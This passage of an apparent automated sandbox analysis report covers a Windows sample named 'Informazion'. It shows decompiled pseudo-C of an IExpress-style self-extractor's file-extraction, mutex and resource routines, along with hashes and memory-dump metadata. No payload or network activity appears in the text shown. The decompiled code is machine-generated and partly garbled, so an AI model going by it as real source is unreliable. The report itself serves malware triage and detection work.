                                                    				_t144 = _t143 - 0x150;
                                                    				_t99 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t98 - 0x68 + 0x40) = _t99 ^ _t143 - 0x00000150;
                                                    				_t154 = _t153 | 0xffffffff;
                                                    				_t75 =  *0x4c51d5fc; // 0x0
                                                    				_t108 = __rdx;
                                                    				if (_t75 == 0) goto 0x4c515904;
                                                    				if (__ecx != 3) goto 0x4c5158fc;
                                                    				E00007FF67FF64C515770(__rdx,  *((intOrPtr*)(__rdx + 0x28)));
                                                    				goto 0x4c515ae8;
                                                    				_t77 = _t62;
                                                    				if (_t77 == 0) goto 0x4c515ade;
                                                    				if (_t77 == 0) goto 0x4c515924;
                                                    				if (_t77 == 0) goto 0x4c515a29;
                                                    				_t65 = _t62 - 0xffffffffffffffff;
                                                    				if (_t77 == 0) goto 0x4c51592b;
                                                    				if (_t65 == 1) goto 0x4c5158fc;
                                                    				goto 0x4c515ae8;
                                                    				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 8)) + _t154 + 1)) != sil) goto 0x4c515932;
                                                    				if ( *((intOrPtr*)(0x4c51d610 + _t154 + 1)) != sil) goto 0x4c515945;
                                                    				if (1 + _t65 - 0x104 >= 0) goto 0x4c5158fc;
                                                    				if (E00007FF67FF64C51512C(_t154 + 1, __rdx, _t143 - 0x150 + 0x30, 0x4c51d610, __rsi,  *((intOrPtr*)(__rdx + 8)), _t156) == 0) goto 0x4c5158fc;
                                                    				if ( *((intOrPtr*)(( *(_t108 + 0x28) << 5) + 0x7ff64c51d044)) == 1) goto 0x4c5158fc;
                                                    				if (DosDateTimeToFileTime(??, ??, ??) == 0) goto 0x4c5158fc;
                                                    				if (LocalFileTimeToFileTime(_t153) == 0) goto 0x4c5158fc;
                                                    				_t48 = SetFileTime(??, ??, ??, ??); // executed
                                                    				if (_t48 == 0) goto 0x4c5158fc;
                                                    				E00007FF67FF64C515770(_t108,  *(_t108 + 0x28)); // executed
                                                    				if ( *((intOrPtr*)(_t108 + 0x34)) != 0) goto 0x4c5159ff;
                                                    				goto 0x4c515a06;
                                                    				_t50 = SetFileAttributesA(_t140); // executed
                                                    				if (_t50 == 0) goto 0x4c5158fc;
                                                    				goto 0x4c515ae8;
                                                    				_t119 =  *0x4c51c828; // 0x0
                                                    				if (_t119 == 0) goto 0x4c515a4a;
                                                    				_t52 = SetDlgItemTextA(??, ??, ??);
                                                    				_t105 = _t154 + 1;
                                                    				if ( *((intOrPtr*)( *((intOrPtr*)(_t108 + 8)) + _t105)) != sil) goto 0x4c515a51;
                                                    				if ( *((intOrPtr*)(0x4c51d610 + _t154 + 1)) != sil) goto 0x4c515a64;
                                                    				if (_t52 + 1 + ( *(_t108 + 0x30) & 0x0000ffff) - 0x104 >= 0) goto 0x4c5158fc;
                                                    				if (E00007FF67FF64C51512C(_t105, _t108, _t143 - 0x150 + 0x30, 0x4c51d610, _t138,  *((intOrPtr*)(_t108 + 8))) == 0) goto 0x4c5158fc;
                                                    				_t56 = E00007FF67FF64C5151BC(_t105, _t108, _t143 - 0x150 + 0x30); // executed
                                                    				if (_t56 == 0) goto 0x4c515924;
                                                    				r8d = 0x180; // executed
                                                    				E00007FF67FF64C515380(0x8302, __ebp, _t108, _t143 - 0x150 + 0x30, 0x4c51d610,  *(_t108 + 0x28) << 5, _t138, _t98 - 0x68); // executed
                                                    				if (_t105 == _t154) goto 0x4c5158fc;
                                                    				if (E00007FF67FF64C51527C(_t105, _t105, _t144 + 0x30, 0x4c51d610, _t138,  *((intOrPtr*)(_t108 + 8)), _t144 + 0x20) == 0) goto 0x4c5158fc;
                                                    				 *0x4c51d820 =  *0x4c51d820 + 1;
                                                    				goto 0x4c515ae8;
                                                    				E00007FF67FF64C515B18(E00007FF67FF64C51527C(_t105, _t105, _t144 + 0x30, 0x4c51d610, _t138,  *((intOrPtr*)(_t108 + 8)), _t144 + 0x20), _t105,  *((intOrPtr*)(_t108 + 8)));
                                                    				return E00007FF67FF64C518470(_t105,  *(_t108 + 0x30) & 0x0000ffff,  *(_t98 - 0x68 + 0x40) ^ _t144);
                                                    			}

                                                    • Disassembly address column: 0x7ff64c5158b0 to 0x7ff64c515b10

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: FileTime$AttributesDateItemLocalText
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                    • API String ID: 851750970-305352358
                                                    • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                    • Instruction ID: 61a205120261631c02498d0296a9049e46d9828d4f1866bed9604c9200e351a0
                                                    • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                    • Instruction Fuzzy Hash: D3518122E1CA4291EB69BF29D4581BD6BA0FB48B90FD44133D96EC3395CE3CE965C340
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00007FF67FF64C516B70(void* __ebx, void* __rax, signed int __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                    				signed int _v32;
                                                    				intOrPtr _v40;
                                                    				signed int _t11;
                                                    				void* _t40;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rbp;
                                                    				_a24 = __rsi;
                                                    				if ( *((char*)(__rcx + (__rbx | 0xffffffff) + 1)) != 0) goto 0x4c516b8b;
                                                    				_t11 = LocalAlloc(??, ??);
                                                    				if (__rax != 0) goto 0x4c516bf5;
                                                    				_v32 = _v32 & _t11;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v40 = 0x10;
                                                    				E00007FF67FF64C514DCC(__rcx, _t40, _t41, _t42);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				return 0;
                                                    			}

                                                    • Disassembly address column: 0x7ff64c516b70 to 0x7ff64c516bf3

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: AllocLocal
                                                    • String ID: TMP4351$.TMP
                                                    • API String ID: 3494564517-2619824408
                                                    • Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                    • Instruction ID: 21dae51203d2d1a4394e8650741604338976ce09c15de3a0cdaafe45ae6d18d6
                                                    • Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                    • Instruction Fuzzy Hash: 5B314E21E0C68186E718BF29A41837EBE50EB85BB5F445336DA7A467D5CF3CD9258600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *MEMCAB
                                                    • API String ID: 0-3211172518
                                                    • Opcode ID: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
                                                    • Instruction ID: 43633deaa25af07c198bfe21678e61e1f60241583e197f7d3d277bff3393f571
                                                    • Opcode Fuzzy Hash: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
                                                    • Instruction Fuzzy Hash: EB313825E1CB4285EA18BF29E44C2AD7BA0BB44790F954237D96D82394EF3CE5A9C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                    • String ID:
                                                    • API String ID: 1084409-0
                                                    • Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                    • Instruction ID: 03b55c7d951df62b4f9a6e9b46785cb7591a73bcb615f4acc6a1717bd84a0c54
                                                    • Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                    • Instruction Fuzzy Hash: FA218E20E1C64286E718FF19E848739BBA0FB84B94F548236D97D867A4DF3CE424CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 28%
                                                    			E00007FF67FF64C5151BC(void* __rax, long long __rbx, long long __rcx, long long _a8) {
                                                    				long long _v16;
                                                    				long long _v24;
                                                    				long _t8;
                                                    				void* _t20;
                                                    				intOrPtr _t21;
                                                    				signed int _t22;
                                                    				void* _t24;
                                                    				void* _t32;
                                                    				void* _t33;
                                                    				intOrPtr _t37;
                                                    
                                                    				_t24 = __rax;
                                                    				_a8 = __rbx;
                                                    				_t8 = GetFileAttributesA(??); // executed
                                                    				_t20 = _t8 - 0xffffffff;
                                                    				if (_t20 == 0) goto 0x4c515263;
                                                    				if (_t20 == 0) goto 0x4c515263;
                                                    				_t21 =  *0x4c51d600; // 0x0
                                                    				if (_t21 != 0) goto 0x4c515246;
                                                    				_t22 =  *0x4c51cd18 & 0x00000001;
                                                    				if (_t22 != 0) goto 0x4c515246;
                                                    				_t37 =  *0x4c51c828; // 0x0
                                                    				_v16 = 6;
                                                    				_v24 = __rbx;
                                                    				 *0x4c51d830 = __rcx;
                                                    				E00007FF67FF64C517AC8(__rax, __rbx, _t32, _t33, _t37, 0x7ff64c513840);
                                                    				if (_t22 == 0) goto 0x4c515246;
                                                    				if (_t22 == 0) goto 0x4c51525f;
                                                    				if (_t24 - 5 != 0x832) goto 0x4c515246;
                                                    				 *0x4c51d600 = 1;
                                                    				SetFileAttributesA(??, ??);
                                                    				goto 0x4c515268;
                                                    				return 1;
                                                    			}

                                                    • Disassembly address column: 0x7ff64c5151bc to 0x7ff64c515272

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                    • String ID:
                                                    • API String ID: 2018477427-0
                                                    • Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                                    • Instruction ID: 0e453b8ad801322d7a998c60b22a9df97e99dbcd5cbb637cb4187337fac1ca54
                                                    • Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                                    • Instruction Fuzzy Hash: A1115E32D0C64282F7597F18A58C37D6EA0EB45758F584232D97D867A5CF7DE8A5C300
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E00007FF67FF64C517BA8(void* __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, signed int __r8, long long _a8, long long _a16, long long _a24) {
                                                    				char* _t23;
                                                    				void* _t42;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rbp;
                                                    				_a24 = __rsi;
                                                    				_t42 = (__r8 | 0xffffffff) + 1;
                                                    				if ( *((char*)(__rcx + _t42)) != 0) goto 0x4c517bc8;
                                                    				if (_t42 + 1 - __edx < 0) goto 0x4c517be1;
                                                    				goto 0x4c517c21;
                                                    				_t23 = __rbx + __rcx;
                                                    				if (_t23 - __rcx <= 0) goto 0x4c517c06;
                                                    				CharPrevA(??, ??); // executed
                                                    				if ( *__rax == 0x5c) goto 0x4c517c06;
                                                    				 *_t23 = 0x5c;
                                                    				 *((char*)(_t23 + 1)) = 0;
                                                    				goto 0x4c517c0e;
                                                    				if ( *((char*)(__r8 + 1)) == 0x20) goto 0x4c517c0b;
                                                    				return E00007FF67FF64C511084(__rcx, __rbp, __r8 + 1);
                                                    			}

                                                    • Disassembly address column: 0x7ff64c517ba8 to 0x7ff64c517c35

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CharPrev
                                                    • String ID:
                                                    • API String ID: 122130370-0
                                                    • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                    • Instruction ID: 23942a27a11cd22b2614973909655b90c13ec9975b0bf0f418cb649c2620c03e
                                                    • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                    • Instruction Fuzzy Hash: F6010411D0C6C186F3057F1DA84826DBE90A745BE4F689271DB79477C6CF2CD4A28B00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                    • Instruction ID: e323578100aeaeed4924e080735d258c9b0e8c2a1e53cdf00c18c1c2e5d9f192
                                                    • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                    • Instruction Fuzzy Hash: 68F01231A0C782D2DB1CAF29F58517C7A60EB48B98F544636DA3B86784CF78D491C710
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 47%
                                                    			E00007FF67FF64C512DB4(long long __rbx, long long __rcx, void* __rdx, long long _a24) {
                                                    				signed int _v40;
                                                    				char _v312;
                                                    				signed int _v320;
                                                    				long long _v328;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __r14;
                                                    				void* _t36;
                                                    				signed char _t42;
                                                    				void* _t62;
                                                    				void* _t90;
                                                    				signed long long _t101;
                                                    				signed long long _t102;
                                                    				long long _t104;
                                                    				void* _t128;
                                                    				void* _t130;
                                                    				void* _t131;
                                                    				void* _t132;
                                                    				void* _t135;
                                                    				void* _t138;
                                                    				void* _t140;
                                                    				void* _t141;
                                                    				void* _t142;
                                                    
                                                    				_a24 = __rbx;
                                                    				_t101 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t102 = _t101 ^ _t132 - 0x00000150;
                                                    				_v40 = _t102;
                                                    				_t130 = __rdx;
                                                    				 *0x4c51de70 = __rcx;
                                                    				_t104 = __rcx;
                                                    				r8d = 0x910;
                                                    				0x4c518b09();
                                                    				r8d = 0x32c;
                                                    				memset(??, ??, ??);
                                                    				r8d = 0x104;
                                                    				memset(??, ??, ??);
                                                    				_t3 = _t128 + 1; // 0x1
                                                    				r14d = _t3;
                                                    				_t4 = _t128 + 0x7f; // 0x7f
                                                    				r8d = _t4;
                                                    				 *0x4c51d818 = r14d;
                                                    				_t36 = E00007FF67FF64C515050(_t102, __rcx, "TITLE", 0x4c51d578, __rdx, _t131);
                                                    				r9d = 0;
                                                    				if (_t36 - 1 - 0x7f > 0) goto 0x4c5130a5;
                                                    				r8d = r14d;
                                                    				CreateEventA(??, ??, ??, ??);
                                                    				 *0x4c51c838 = _t102;
                                                    				SetEvent(??);
                                                    				_t5 = _t128 + 4; // 0x4
                                                    				r8d = _t5;
                                                    				if (E00007FF67FF64C515050(_t102, _t104, "EXTRACTOPT", 0x4c51de64, _t130, _t131) != 0) goto 0x4c512ec3;
                                                    				_v320 = _v320 & 0;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v328 = 0x10;
                                                    				E00007FF67FF64C514DCC("EXTRACTOPT", _t135, _t138, _t140);
                                                    				 *0x4c51d544 = 0x80070714;
                                                    				goto 0x4c5130be;
                                                    				_t42 =  *0x4c51de64; // 0x1
                                                    				if ((_t42 & 0x00000040) != 0) goto 0x4c512ed5;
                                                    				if (_t42 >= 0) goto 0x4c512fa3;
                                                    				r8d = 0x104;
                                                    				if (E00007FF67FF64C515050(_t102, _t104, "INSTANCECHECK",  &_v312, _t130, _t131) != 0) goto 0x4c512efe;
                                                    				_v320 = _v320 & 0;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				goto 0x4c512ea2;
                                                    				CreateMutexA(??, ??, ??);
                                                    				 *0x4c51c830 = _t102;
                                                    				if (_t102 == 0) goto 0x4c512fa3;
                                                    				if (GetLastError() != 0xb7) goto 0x4c512fa3;
                                                    				r9d = 0;
                                                    				if (( *0x4c51de64 & 0x00000080) == 0) goto 0x4c512f62;
                                                    				_v320 = _v320 & 0;
                                                    				_v328 = 0x10;
                                                    				E00007FF67FF64C514DCC("INSTANCECHECK", 0x4c51d578, _t138, _t140);
                                                    				goto 0x4c512f81;
                                                    				_v320 = 4;
                                                    				_v328 = 0x20;
                                                    				if (E00007FF67FF64C514DCC("INSTANCECHECK", 0x4c51d578, _t138, _t140) == 6) goto 0x4c512fa3;
                                                    				CloseHandle(??);
                                                    				 *0x4c51d544 = 0x800700b7;
                                                    				goto 0x4c5130be;
                                                    				 *0x4c51d540 =  *0x4c51d540 & 0;
                                                    				if (E00007FF67FF64C5170A8(_t62, _t104, _t130, _t128, _t130, _t141) != 0) goto 0x4c512fc4;
                                                    				r9d = 0;
                                                    				goto 0x4c5130aa;
                                                    				_t90 =  *0x4c51cd1a - dil; // 0x0
                                                    				if (_t90 == 0) goto 0x4c512fde;
                                                    				E00007FF67FF64C51204C(_t104, 0x4c51cd1a,  &_v312, _t130);
                                                    				goto 0x4c5130be;
                                                    				r8d = 0xa;
                                                    				FindResourceA(??, ??, ??);
                                                    				if (_t102 == 0) goto 0x4c513014;
                                                    				LoadResource(??, ??);
                                                    				if ( *0x4c51c1ac == 0) goto 0x4c513029;
                                                    				__imp__#17();
                                                    				if ( *0x4c51cd04 == 0) goto 0x4c51303a;
                                                    				goto 0x4c5130c0;
                                                    				if (E00007FF67FF64C513BF4(_t104, _t102, _t102, _t102, _t130, _t141) == 0) goto 0x4c5130be;
                                                    				if (( *0x4c51de78 & 0x0000ffff) - r14w - 2 > 0) goto 0x4c513032;
                                                    				if (( *0x4c51de64 & 0x00000100) == 0) goto 0x4c513032;
                                                    				if (( *0x4c51cd18 & r14b) != 0) goto 0x4c513032;
                                                    				if (E00007FF67FF64C5112EC(0, 0x520, _t104, _t102, _t102, _t130, 0x4c51d578, _t142) != 0) goto 0x4c513032;
                                                    				_v320 = 0x83e;
                                                    				r8d = 0;
                                                    				_v328 = 0x547;
                                                    				E00007FF67FF64C517AC8(_t102, _t104, _t130, _t131, 0x4c51d578, 0x7ff64c511500);
                                                    				if (_t102 != 0x83d) goto 0x4c5130be;
                                                    				goto 0x4c513032;
                                                    				_v320 = _v320 & 0;
                                                    				r8d = 0;
                                                    				_v328 = 0x10;
                                                    				E00007FF67FF64C514DCC(_t102, 0x4c51d578, 0x7ff64c511500, _t140);
                                                    				return E00007FF67FF64C518470(0, 0, _v40 ^ _t132 - 0x00000150);
                                                    			}

                                                    0x7ff64c512db4
                                                    0x7ff64c512dc4
                                                    0x7ff64c512dcb
                                                    0x7ff64c512dce
                                                    0x7ff64c512dd6
                                                    0x7ff64c512dd9
                                                    0x7ff64c512de0
                                                    0x7ff64c512dec
                                                    0x7ff64c512df4
                                                    0x7ff64c512e02
                                                    0x7ff64c512e08
                                                    0x7ff64c512e16
                                                    0x7ff64c512e1c
                                                    0x7ff64c512e21
                                                    0x7ff64c512e21
                                                    0x7ff64c512e25
                                                    0x7ff64c512e25
                                                    0x7ff64c512e29
                                                    0x7ff64c512e3e
                                                    0x7ff64c512e45
                                                    0x7ff64c512e4d
                                                    0x7ff64c512e53
                                                    0x7ff64c512e59
                                                    0x7ff64c512e68
                                                    0x7ff64c512e6f
                                                    0x7ff64c512e7b
                                                    0x7ff64c512e7b
                                                    0x7ff64c512e94
                                                    0x7ff64c512e96
                                                    0x7ff64c512e9a
                                                    0x7ff64c512e9d
                                                    0x7ff64c512ea7
                                                    0x7ff64c512eaf
                                                    0x7ff64c512eb4
                                                    0x7ff64c512ebe
                                                    0x7ff64c512ec3
                                                    0x7ff64c512ecb
                                                    0x7ff64c512ecf
                                                    0x7ff64c512ed5
                                                    0x7ff64c512ef0
                                                    0x7ff64c512ef2
                                                    0x7ff64c512ef6
                                                    0x7ff64c512ef9
                                                    0x7ff64c512efc
                                                    0x7ff64c512f06
                                                    0x7ff64c512f12
                                                    0x7ff64c512f1c
                                                    0x7ff64c512f33
                                                    0x7ff64c512f35
                                                    0x7ff64c512f48
                                                    0x7ff64c512f4a
                                                    0x7ff64c512f53
                                                    0x7ff64c512f5b
                                                    0x7ff64c512f60
                                                    0x7ff64c512f62
                                                    0x7ff64c512f6f
                                                    0x7ff64c512f7f
                                                    0x7ff64c512f88
                                                    0x7ff64c512f94
                                                    0x7ff64c512f9e
                                                    0x7ff64c512fa3
                                                    0x7ff64c512fb3
                                                    0x7ff64c512fb5
                                                    0x7ff64c512fbf
                                                    0x7ff64c512fc4
                                                    0x7ff64c512fcb
                                                    0x7ff64c512fd4
                                                    0x7ff64c512fd9
                                                    0x7ff64c512fde
                                                    0x7ff64c512fee
                                                    0x7ff64c512ffd
                                                    0x7ff64c513005
                                                    0x7ff64c51301b
                                                    0x7ff64c51301d
                                                    0x7ff64c513030
                                                    0x7ff64c513035
                                                    0x7ff64c513044
                                                    0x7ff64c513055
                                                    0x7ff64c513061
                                                    0x7ff64c51306a
                                                    0x7ff64c513073
                                                    0x7ff64c513075
                                                    0x7ff64c513085
                                                    0x7ff64c513088
                                                    0x7ff64c513096
                                                    0x7ff64c5130a1
                                                    0x7ff64c5130a3
                                                    0x7ff64c5130aa
                                                    0x7ff64c5130ae
                                                    0x7ff64c5130b1
                                                    0x7ff64c5130b9
                                                    0x7ff64c5130e3

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                    • String ID: $EXTRACTOPT$INSTANCECHECK$Maintal$TITLE$VERCHECK
                                                    • API String ID: 3100096412-578564683
                                                    • Opcode ID: cf8a1d479714e7ed34faaa90c85d6102251d189b7b9a7dba6c65d19b03d87f13
                                                    • Instruction ID: 289d9bc341b17821e0ca411c9053ae494b5d789cf5dd4c2dc68fe282bf58a24c
                                                    • Opcode Fuzzy Hash: cf8a1d479714e7ed34faaa90c85d6102251d189b7b9a7dba6c65d19b03d87f13
                                                    • Instruction Fuzzy Hash: D6818931E1C6428AF728BF18A8587BD3EA0AF84784F404137D96EC27A5CF7CA525CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 44%
                                                    			E00007FF67FF64C513530(void* __edx, void* __eflags, signed long long __rax, long long __rbx, void* __rcx, long long __rdi, long long __rbp, void* __r8, void* __r9, long long _a16, long long _a24, long long _a32) {
                                                    				signed int _v16;
                                                    				signed long long _v24;
                                                    				char _t29;
                                                    				signed int _t32;
                                                    				void* _t46;
                                                    				void* _t69;
                                                    				void* _t87;
                                                    				signed long long _t89;
                                                    				void* _t91;
                                                    				long long _t93;
                                                    				void* _t117;
                                                    				void* _t119;
                                                    				void* _t135;
                                                    				void* _t136;
                                                    				void* _t137;
                                                    
                                                    				_t135 = __r9;
                                                    				_t93 = __rbx;
                                                    				_t89 = __rax;
                                                    				_a16 = __rbx;
                                                    				_a24 = __rbp;
                                                    				_a32 = __rdi;
                                                    				r15d = 0x10;
                                                    				_t117 = __rcx;
                                                    				if (__eflags == 0) goto 0x4c513802;
                                                    				_t46 = _t137 - 0xf;
                                                    				if (__eflags == 0) goto 0x4c51377e;
                                                    				_t69 = __edx - r15d - 0x100 - _t46;
                                                    				if (_t69 == 0) goto 0x4c513572;
                                                    				goto 0x4c513815;
                                                    				if (_t69 == 0) goto 0x4c513635;
                                                    				if (_t69 == 0) goto 0x4c513618;
                                                    				if (__r8 - __rbx - __rbx != 0x834) goto 0x4c5137fd;
                                                    				r9d = 0x200;
                                                    				if (LoadStringA(??, ??, ??, ??) != 0) goto 0x4c5135de;
